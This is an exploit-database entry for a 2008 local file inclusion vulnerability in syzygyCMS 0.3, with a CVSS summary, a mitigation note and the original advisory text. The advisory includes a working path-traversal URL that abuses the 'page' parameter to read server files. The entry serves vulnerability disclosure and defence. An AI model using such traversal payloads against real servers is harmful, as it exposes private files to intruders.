header-logo
Suggest Exploit
vendor:
syzygyCMS
by:
SirGod
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: syzygyCMS
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

syzygyCMS 0.3 Local File Inclusion

The syzygyCMS 0.3 has a Local File Inclusion vulnerability. An attacker can exploit this vulnerability by manipulating the 'page' parameter in the URL to include arbitrary files from the server.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files from the server.
Source

Exploit-DB raw data:

######################################
[+] syzygyCMS 0.3 Local File Inclusion    
[+] Discovered By SirGod                           
[+] www.mortal-team.com                           
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
[+] also ToxicBlood,MesSiAH,xZu
######################################

Example :

http://localhost/x/index.php?page=../../../autoexec.bat

This will open autoexec.bat .

###########################################

# milw0rm.com [2008-08-03]

Navigation

Suggest Exploit

Services By CQR